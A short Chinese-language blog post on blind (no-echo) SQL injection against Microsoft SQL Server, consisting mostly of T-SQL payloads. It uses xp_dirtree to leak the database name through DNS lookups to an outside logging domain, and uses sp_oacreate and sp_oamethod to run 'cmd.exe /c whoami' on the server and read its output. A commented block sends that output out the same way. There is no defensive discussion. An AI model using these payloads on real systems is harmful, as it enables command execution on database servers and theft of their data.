mssql 无回显 注入

作者: print("") 分类: 信息安全 发布时间: 2019-06-13 14:44

DECLARE @host varchar(128);
SELECT @host=(select db_name())+ '.hfkzaq.ceye.io';
select @host;
EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');

declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
 
--exec sp_oamethod @luan,'run',null,'calc.exe';
 
exec sp_oamethod @luan,'exec',@exec output,'c:\windows\system32\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out
select @str+'1';

--DECLARE @host varchar(128);
--SELECT @host=@str+'.hfkzaq.ceye.io';
--DECLARE @ho2st varchar(128);
--select @ho2st=Replace(@host,' ','');
--SELECT @ho2st;

--EXEC('master..xp_dirtree "\\'+@host +'\foobar$"');

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

一条评论
  • life

    2019年7月16日 下午2:38

    lifelife

life进行回复 取消回复

您的电子邮箱地址不会被公开。